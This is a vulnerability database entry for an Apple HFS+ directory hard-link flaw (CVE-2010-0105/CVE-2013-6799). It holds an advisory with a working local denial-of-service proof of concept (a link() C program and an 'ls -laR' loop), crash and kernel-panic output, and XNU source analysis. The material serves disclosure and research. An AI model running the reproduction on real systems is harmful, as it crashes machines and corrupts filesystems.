var-201004-0093
Vulnerability from variot
The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. Exploiting this issue allows local, unprivileged users to crash affected system, denying further service to legitimate users. Apple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Apple Mac is the operating system used by the Apple family of computers. MacOSX/XNU HFS Multiple Vulnerabilities Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/
===================
On November 8th, I've reported vulnerability in hard links for HFS+ (CVE-2013-6799)
http://cxsecurity.com/issue/WLB-2013110059
The HFS+ file system does not apply strict privilege rules during the creating of hard links. The ability to create hard links to directories is wrong implemented and such an issue is affecting os versions greater or equal to 10.5. Officially Apple allows you to create hard links only for your time machine. Vulnerability CVE-2013-6799 (incomplete fix for CVE-2010-0105) allow to create hard link to directory and the number of hard links may be freely high. To create N hard links, you must use a special algorithm which creates links from the top of the file system tree. This means that first we create the directory structure and once created we need to go from up to down by creating hard links. The last time I've mentioned of the possibility of a kernel crash by performing the 'ls' command. This situation occurs in conjunction with the 'find' application.
Commands such as 'ls' behave in unexpected ways. Apple are going find this crash point in code. To create huge hard links structure, use this code
http://cert.cx/stuff/l2.c
h1XSS:tysiak cx$ uname -a Darwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16 19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64 h1xss:tysiak cx$ gcc -o l2 l2.c h1xss:tysiak cx$ ./l2 1000 ... h1xss:tysiak cx$ cat loop.sh
!/bin/bash
while [ 1 ] ; do ls -laR B > /dev/null done
h1xss:tysiak cx$ sh ./loop.sh ls: B: No such file or directory ls: X1: No such file or directory ... ls: X8: Bad address ls: X1: Bad address ls: X2: Bad address ... ls: X8: No such file or directory ./loop.sh: line 4: 8816 Segmentation fault: 11 ls -laR B > /dev/null ./loop.sh: line 4: 8818 Segmentation fault: 11 ls -laR B > /dev/null ls: B: No such file or directory ls: X1: No such file or directory ls: X2: No such file or directory ... ls: X1: No such file or directory ls: X2: No such file or directory
...
Feb 9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for ls[9418] version 230 to /Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash
That what we can see here is unexpected behavior of LS command. LS process is also affected for infinite loop (recursion?).
h1xss:tysiak cx$ ps -fp 8822 UID PID PPID C STIME TTY TIME CMD 501 8822 8810 0 7:36 ttys002 62:19.65 ls -laR B
or used parallely with (find . > /dev/null) command cause a kernel crash
Mon Mar 31 20:30:41 2014 panic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838, type 13=general protection, registers: CR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c, CR4: 0x00000000001606e0 RAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000, RDX: 0x0000000000000000 RSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018, RDI: 0xffffff802f23bcd0 R8: 0xffffff8140d9bc1c, R9: 0xffffff802f26e960, R10: 0xffffff8140d9ba2c, R11: 0x0000000000000f92 R12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0, R15: 0xffffff802f26e960 RFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS: 0x0000000000000008, SS: 0x0000000000000010 Fault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU: 0x0
Backtrace (CPU 0), Frame : Return Address 0xffffff811eee8c50 : 0xffffff8004422fa9
BSD process name corresponding to current thread: ls
XNU is the computer operating system kernel that Apple Inc. acquired and developed for use in the Mac OS X operating system and released as free and open source software as part of the Darwin operating system. We can try to see HFS implementation code. Let's start static code analysys using cifrex.org tool!
-1.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference in hfs_vfsops.c
Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vfsops.c
--- hfs_vfsops.c ---------------------------- / * HFS filesystem related variables. / int hfs_sysctl(int name, __unused u_int namelen, user_addr_t oldp, size_t oldlenp, user_addr_t newp, size_t newlen, vfs_context_t context) { ... if ((newlen <= 0) || (newlen > MAXPATHLEN)) return (EINVAL);
bufsize = MAX(newlen * 3, MAXPATHLEN);
MALLOC(filename, char *, newlen, M_TEMP, M_WAITOK);
if (filename == NULL) { <=====================================
filename CHECK error = ENOMEM; goto encodinghint_exit; } MALLOC(unicode_name, u_int16_t *, bufsize, M_TEMP, M_WAITOK); if (filename == NULL) { <====================================== double CHECK? error = ENOMEM; goto encodinghint_exit; }
error = copyin(newp, (caddr_t)filename, newlen);
if (error == 0) {
error = utf8_decodestr((u_int8_t *)filename, newlen - 1,
unicode_name, &bytes, bufsize, 0, UTF_DECOMPOSED); if (error == 0) { hint = hfs_pickencoding(unicode_name, bytes / 2); error = sysctl_int(oldp, oldlenp, USER_ADDR_NULL, 0, (int32_t *)&hint); } } --- hfs_vfsops.c----------------------------
Twice checking of 'filename' has no sense. Probably 'unicode_name' should be checked in second condition.
-2.--------------------------------------------------------- Possible Buffer Overflow in resource fork (hfs_vnops.c)
Unverified value returned by snprintf() may be bigger as a declared buffer (MAXPATHLEN).
https://developer.apple.com/library/mac/documentation/Darwin/Reference/ManPages/man3/snprintf.3.html
The snprintf() and vsnprintf() functions will write at most n-1 of the characters printed into the out-put output put string (the n'th character then gets the terminating `\0'); if the return value is greater than or equal to the n argument, the string was too short and some of the printed characters were discarded. The output is always null-terminated.
Code: http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_vnops.c
--- hfs_vnops.c ---------------------------- ... / * hfs_vgetrsrc acquires a resource fork vnode corresponding to the cnode that is * found in 'vp'. The rsrc fork vnode is returned with the cnode locked and iocount * on the rsrc vnode. * ... /
int hfs_vgetrsrc(struct hfsmount hfsmp, struct vnode vp, struct vnode **rvpp, int can_drop_lock, int error_on_unlinked) {
...
/ * Supply hfs_getnewvnode with a component name. / cn.cn_pnbuf = NULL; if (descptr->cd_nameptr) { MALLOC_ZONE(cn.cn_pnbuf, caddr_t, MAXPATHLEN, M_NAMEI, M_WAITOK); cn.cn_nameiop = LOOKUP; cn.cn_flags = ISLASTCN | HASBUF; cn.cn_context = NULL; cn.cn_pnlen = MAXPATHLEN; cn.cn_nameptr = cn.cn_pnbuf; cn.cn_hash = 0; cn.cn_consume = 0; cn.cn_namelen = snprintf(cn.cn_nameptr, MAXPATHLEN, <================ "%s%s", descptr->cd_nameptr, _PATH_RSRCFORKSPEC); } dvp = vnode_getparent(vp); error = hfs_getnewvnode(hfsmp, dvp, cn.cn_pnbuf ? &cn : NULL, <================ descptr, GNV_WANTRSRC | GNV_SKIPLOCK, &cp->c_attr, &rsrcfork, &rvp, &newvnode_flags);
--- hfs_vnops.c ----------------------------
Pattern is '%s%s' where sum of length descptr->cd_nameptr and _PATH_RSRCFORKSPEC may be bigger as a declared buffer size (MAXPATHLEN). Size of descptr->cd_nameptr is MAXPATHLEN and value _PATH_RSRCFORKSPEC is
#define _PATH_RSRCFORKSPEC "/..namedfork/rsrc"
where length is 17 chars. Possible up to 17 chars overflow here?.
Now let's see hfs_getnewvnode function
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_cnode.c
--- hfs_cnode.c ---------------------------- hfs_getnewvnode( struct hfsmount hfsmp, struct vnode dvp, struct componentname cnp, <======== WATCH THIS struct cat_desc descp, int flags, struct cat_attr attrp, struct cat_fork forkp, struct vnode vpp, int out_flags) { ... if ((vpp != NULL) && (cnp)) { / we could be requesting the rsrc of a hardlink file... / vnode_update_identity (*vpp, dvp, cnp->cn_nameptr, cnp->cn_namelen, cnp->cn_hash, <== NAMELEN HERE (VNODE_UPDATE_PARENT | VNODE_UPDATE_NAME)); ... --- hfs_cnode.c ----------------------------
and call to vnode_update_indentity()
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/vfs/vfs_cache.c
--- vfs_cache.c ---------------------------- void vnode_update_identity(vnode_t vp, vnode_t dvp, const char name, int name_len, uint32_t name_hashval, int flags) { ... if ( (flags & VNODE_UPDATE_NAME) ) { if (name != vp->v_name) { if (name && name) { if (name_len == 0) name_len = strlen(name); tname = vfs_addname(name, name_len, name_hashval, 0); <== NAMELEN HERE } } else flags &= ~VNODE_UPDATE_NAME; } ... const char * vfs_addname(const char *name, uint32_t len, u_int hashval, u_int flags) { return (add_name_internal(name, len, hashval, FALSE, flags)); <== CALL
} --- vfs_cache.c ----------------------------
And invalid memory reference in add_name_internal()
--- vfs_cache.c ---------------------------- static const char * add_name_internal(const char name, uint32_t len, u_int hashval, boolean_t need_extra_ref, __unused u_int flags) { struct stringhead head; string_t entry; uint32_t chain_len = 0; uint32_t hash_index; uint32_t lock_index; char ptr;
/*
* if the length already accounts for the null-byte, then
* subtract one so later on we don't index past the end
* of the string.
*/
if (len > 0 && name[len-1] == '\0') { <===== INVALID MEMORY REFERENCE
len--;
}
if (hashval == 0) {
hashval = hash_string(name, len);
}
--- vfs_cache.c ----------------------------
-3.--------------------------------------------------------- Unchecked Return Value to NULL Pointer Dereference hfs_catalog.c and not only
Please pay attention that a buffer length check (stored in some variable) should be performed; also return from *alloc() function family should be verified for possible NULL pointers. Here are a few FALSE / POSITIVE examples.
http://opensource.apple.com/source/xnu/xnu-2422.1.72/bsd/hfs/hfs_catalog.c
--- hfs_catalog.c ---------------------------- / * builddesc - build a cnode descriptor from an HFS+ key / static int builddesc(const HFSPlusCatalogKey key, cnid_t cnid, u_int32_t hint, u_int32_t encoding, int isdir, struct cat_desc descp) { int result = 0; unsigned char * nameptr; size_t bufsize; size_t utf8len; unsigned char tmpbuff[128];
/* guess a size... */
bufsize = (3 * key->nodeName.length) + 1;
if (bufsize >= sizeof(tmpbuff) - 1) { <============================
MALLOC(nameptr, unsigned char *, bufsize, M_TEMP, M_WAITOK); <=
MALLOC FAIL } else { nameptr = &tmpbuff[0]; }
result = utf8_encodestr(key->nodeName.unicode,
key->nodeName.length * sizeof(UniChar),
nameptr, (size_t *)&utf8len, <============================
... maxlinks = MIN(entrycnt, (u_int32_t)(uio_resid(uio) / SMALL_DIRENTRY_SIZE)); bufsize = MAXPATHLEN + (maxlinks * sizeof(linkinfo_t)) + sizeof(iterator); if (extended) { bufsize += 2sizeof(struct direntry); } MALLOC(buffer, void , bufsize, M_TEMP, M_WAITOK); <============================ bzero(buffer, bufsize); ... FREE(nameptr, M_TEMP); MALLOC(nameptr, unsigned char , bufsize, M_TEMP, M_WAITOK); <==============
result = utf8_encodestr(key->nodeName.unicode, key->nodeName.length * sizeof(UniChar), nameptr, (size_t )&utf8len, bufsize, ':', 0); } ... cnp = (const CatalogName )&ckp->hfsPlus.nodeName; bufsize = 1 + utf8_encodelen(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), ':', 0); MALLOC(new_nameptr, u_int8_t *, bufsize, M_TEMP, M_WAITOK); <======== result = utf8_encodestr(cnp->ustr.unicode, cnp->ustr.length * sizeof(UniChar), new_nameptr, &tmp_namelen, bufsize, ':', 0);
--- hfs_catalog.c ----------------------------
The above examples does not look nice, too. Are you among them is the crux of the problem applications and kernel crash? I informed Apple of those possible errors, it has passed more than a month and I still have not received any comment nor solution.
--- 1. References --- http://cxsecurity.com/issue/WLB-2014040027 http://cxsecurity.com/cveshow/CVE-2013-6799/ http://cxsecurity.com/cveshow/CVE-2010-0105/
--- 2. Greetz --- Kacper George and Michal
--- 3. Credit --- Maksymilian Arciemowicz http://cxsecurity.com/ http://cifrex.org/ http://cert.cx/
Best regards, CXSEC TEAM http://cxsec.org/
. Apple MacOSX 10.9 Hard Link Memory Corruption
Date: 08.11.2013 http://cxsecurity.com/ http://cvemap.org/
URL: http://cxsecurity.com/issue/WLB-2013110059
-
- Description ---
In most UNIX-like systems a hard link to a directory is only reserved for the 'root' user when possible at all. In MacOSX 10.6 there was one such a vulnerability (CVE-2010-0105) causing the filesystem being resulting corrupted; the creation of many hard links was the cause. A notable exception to this is Mac OS X v10.5 (Leopard) and newer, which use hard links on directories for the Time Machine backup mechanism only.'
'Only for the Time Machine' is not True. Let's see quick PoC
A plain program performing a system call (link)
mac-cxs-XK:pochd XK$ cat test.c
include
include
void usage(const char program) { const char message = " [src_dir] [target_dir]"; fprintf(stderr, "%s%s\n", program, message); }
int main(int argc, char* argv[]) { if (argc!=3) { usage(argv[0]); return 1; }
int ret = link(argv[1],argv[2]);
fprintf(stderr,"link(3) return= %d\n", ret);
return ret;
}
mac-cxs-XK:pochd XK$ gcc -o test test.c mac-cxs-XK:pochd XK$ ls test test.c mac-cxs-XK:pochd XK$ mkdir DIR1 mac-cxs-XK:pochd XK$ ./test DIR1 Hardlink1 link(3) return= -1 mac-cxs-XK:pochd XK$ mkdir DIR1/DIR2 mac-cxs-XK:pochd XK$ ./test DIR1/DIR2 Hardlink2 link(3) return= 0 mac-cxs-XK:pochd XK$ cd DIR1 mac-cxs-XK:DIR1 XK$ mkdir DIR2/DIR3 mac-cxs-XK:DIR1 XK$ ../test DIR2/DIR3 Hardlink3 link(3) return= 0 mac-cxs-XK:DIR1 XK$ cd DIR2 mac-cxs-XK:DIR2 XK$ mkdir DIR3/DIR4 mac-cxs-XK:DIR2 XK$ ../../test DIR3/DIR4 Hardlink4 link(3) return= -1
Hardlink1 and Hardlink4 failed instead Hardlink2 and Hardlink3 did not; so which may be the cause? In my opinion we should recognize it as a security flaw and if Apple is not going to fix this vulnerability then someone should change the Wikipedias at least.
Operation (functionality) of hard links differs from those described in "Unix Internals: The New Frontiers" book (by Uresh Vahalia) Old unix standards simply prevent to create any hard link to whatever directory for any user (root included).
Is that new CWE-DesignError vulnerability or new UNIX style?
There may be many possible bad consequences coming out from wrong 'hard link' handling. We will not yet public full description of this problem but we do know that it exists and that it may exhaust kernel/system resources,
it may cause application crashes or kernel panics. Let's wait for new MacOSX version.
A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A/A:
total 0
Process 14413 stopped
* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylibstrlen + 18, queue = 'com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)
frame #0: 0x00007fff948f7812 libsystem_c.dylibstrlen + 18
libsystem_c.dylibstrlen + 18:
-> 0x7fff948f7812: pcmpeqb (%rdi), %xmm0
0x7fff948f7816: pmovmskb %xmm0, %esi
0x7fff948f781a: andq $15, %rcx
0x7fff948f781e: orq $-1, %rax
(lldb)
(lldb) bt
* thread #1: tid = 0x90ba, 0x00007fff948f7812 libsystem_c.dylibstrlen + 18, queue = 'com.apple.main-thread, stop reason = EXC_BAD_ACCESS (code=1, address=0xffb21290)
frame #0: 0x00007fff948f7812 libsystem_c.dylib`strlen + 18
..
Does the kernel panic correspond to 'ls' ? More details soon. Credit --- Maksymilian Arciemowicz ( http://cert.cx/ )
Frist CVE&CWE compatible bugtraq http://cxsecurity.com/ http://cvemap.org/
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201004-0093",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.3"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.2"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.4"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.1"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.5.8"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 1.6,
"vendor": "apple",
"version": "10.6.0"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.5.8"
},
{
"model": "mac os x server",
"scope": "eq",
"trust": 0.8,
"vendor": "apple",
"version": "v10.6 to v10.6.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6"
},
{
"model": "mac os",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "mac os server",
"scope": "ne",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.6"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.3"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.8"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.5"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.7"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.2"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.5.1"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.4"
},
{
"model": "mac os server",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.6.3"
}
],
"sources": [
{
"db": "BID",
"id": "39658"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:apple:mac_os_x",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:apple:mac_os_x_server",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Maksymilian Arciemowicz max@jestsuper.pl",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
}
],
"trust": 0.6
},
"cve": "CVE-2010-0105",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "CVE-2010-0105",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 4.9,
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"id": "VHN-42710",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:L/AC:L/AU:N/C:N/I:N/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2010-0105",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2010-0105",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201004-447",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-42710",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-42710"
},
{
"db": "JVNDB",
"id": "JVNDB-2010-002403"
},
{
"db": "CNNVD",
"id": "CNNVD-201004-447"
},
{
"db": "NVD",
"id": "CVE-2010-0105"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The hfs implementation in Apple Mac OS X 10.5.8 and 10.6.x before 10.6.5 supports hard links to directories and does not prevent certain deeply nested directory structures, which allows local users to cause a denial of service (filesystem corruption) via a crafted application that calls the mkdir and link functions, related to the fsck_hfs program in the diskdev_cmds component. Apple Mac OS X is prone to a local denial-of-service vulnerability. \nExploiting this issue allows local, unprivileged users to crash affected system, denying further service to legitimate users. \nApple Mac OS X 10.6.2 and 10.6.3 are affected; other versions may also be vulnerable. Apple Mac is the operating system used by the Apple family of computers. MacOSX/XNU HFS Multiple Vulnerabilities\nMaksymilian Arciemowicz\nhttp://cxsecurity.com/\nhttp://cifrex.org/\n\n===================\n\nOn November 8th, I\u0027ve reported vulnerability in hard links for HFS+\n(CVE-2013-6799)\n\nhttp://cxsecurity.com/issue/WLB-2013110059\n\nThe HFS+ file system does not apply strict privilege rules during the\ncreating of hard links. The ability to create hard links to directories is\nwrong implemented and such an issue is affecting os versions greater or\nequal to 10.5. Officially Apple allows you to create hard links only for\nyour time machine. \u003csee wiki\u003e Vulnerability CVE-2013-6799 (incomplete fix\nfor CVE-2010-0105) allow to create hard link to directory and the number of\nhard links may be freely high. To create N hard links, you must use a\nspecial algorithm which creates links from the top of the file system tree. \nThis means that first we create the directory structure and once created we\nneed to go from up to down by creating hard links. The last time I\u0027ve\nmentioned of the possibility of a kernel crash by performing the \u0027ls\u0027\ncommand. This situation occurs in conjunction with the \u0027find\u0027 application. \n\nCommands such as \u0027ls\u0027 behave in unexpected ways. Apple are going find this\ncrash point in code. To create huge hard links structure, use this code\n\nhttp://cert.cx/stuff/l2.c\n\n-----------------------------------\nh1XSS:tysiak cx$ uname -a\nDarwin 000000000000000.home 13.1.0 Darwin Kernel Version 13.1.0: Thu Jan 16\n19:40:37 PST 2014; root:xnu-2422.90.20~2/RELEASE_X86_64 x86_64\nh1xss:tysiak cx$ gcc -o l2 l2.c\nh1xss:tysiak cx$ ./l2 1000\n... \nh1xss:tysiak cx$ cat loop.sh\n#!/bin/bash\nwhile [ 1 ] ; do\nls -laR B \u003e /dev/null\ndone\n\nh1xss:tysiak cx$ sh ./loop.sh\nls: B: No such file or directory\nls: X1: No such file or directory\n... \nls: X8: Bad address\nls: X1: Bad address\nls: X2: Bad address\n... \nls: X8: No such file or directory\n./loop.sh: line 4: 8816 Segmentation fault: 11 ls -laR B \u003e /dev/null\n./loop.sh: line 4: 8818 Segmentation fault: 11 ls -laR B \u003e /dev/null\nls: B: No such file or directory\nls: X1: No such file or directory\nls: X2: No such file or directory\n... \nls: X1: No such file or directory\nls: X2: No such file or directory\n-----------\n... \n-----------\nFeb 9 21:16:38 h1xss.home ReportCrash[9419]: Saved crash report for\nls[9418] version 230 to\n/Users/freak/Library/Logs/DiagnosticReports/ls_2014-02-09-211638_h1XSS.crash\n-----------\n\nThat what we can see here is unexpected behavior of LS command. LS process\nis also affected for infinite loop (recursion?). \n\n-----------\nh1xss:tysiak cx$ ps -fp 8822\n UID PID PPID C STIME TTY TIME CMD\n 501 8822 8810 0 7:36 ttys002 62:19.65 ls -laR B\n-----------\n\nor used parallely with (find . \u003e /dev/null) command cause a kernel crash\n\n-----------\nMon Mar 31 20:30:41 2014\npanic(cpu 0 caller 0xffffff80044dbe2e): Kernel trap at 0xffffff8004768838,\ntype 13=general protection, registers:\nCR0: 0x0000000080010033, CR2: 0xffffff8122877004, CR3: 0x0000000001a5408c,\nCR4: 0x00000000001606e0\nRAX: 0xffffff802bc148a0, RBX: 0xdeadbeefdeadbeef, RCX: 0x0000000000008000,\nRDX: 0x0000000000000000\nRSP: 0xffffff8140d9b990, RBP: 0xffffff8140d9b9a0, RSI: 0x0000000000000018,\nRDI: 0xffffff802f23bcd0\nR8: 0xffffff8140d9bc1c, R9: 0xffffff802f26e960, R10: 0xffffff8140d9ba2c,\nR11: 0x0000000000000f92\nR12: 0xffffff801ba1a008, R13: 0xffffff8140d9bb20, R14: 0xffffff802f23bcd0,\nR15: 0xffffff802f26e960\nRFL: 0x0000000000010282, RIP: 0xffffff8004768838, CS: 0x0000000000000008,\nSS: 0x0000000000000010\nFault CR2: 0xffffff8122877004, Error code: 0x0000000000000000, Fault CPU:\n0x0\n\nBacktrace (CPU 0), Frame : Return Address\n0xffffff811eee8c50 : 0xffffff8004422fa9\n\nBSD process name corresponding to current thread: ls\n-----------\n\nXNU is the computer operating system kernel that Apple Inc. acquired and\ndeveloped for use in the Mac OS X operating system and released as free and\nopen source software as part of the Darwin operating system. We can try to\nsee HFS implementation code. Let\u0027s start static code analysys using\ncifrex.org tool!\n\n-1.---------------------------------------------------------\nUnchecked Return 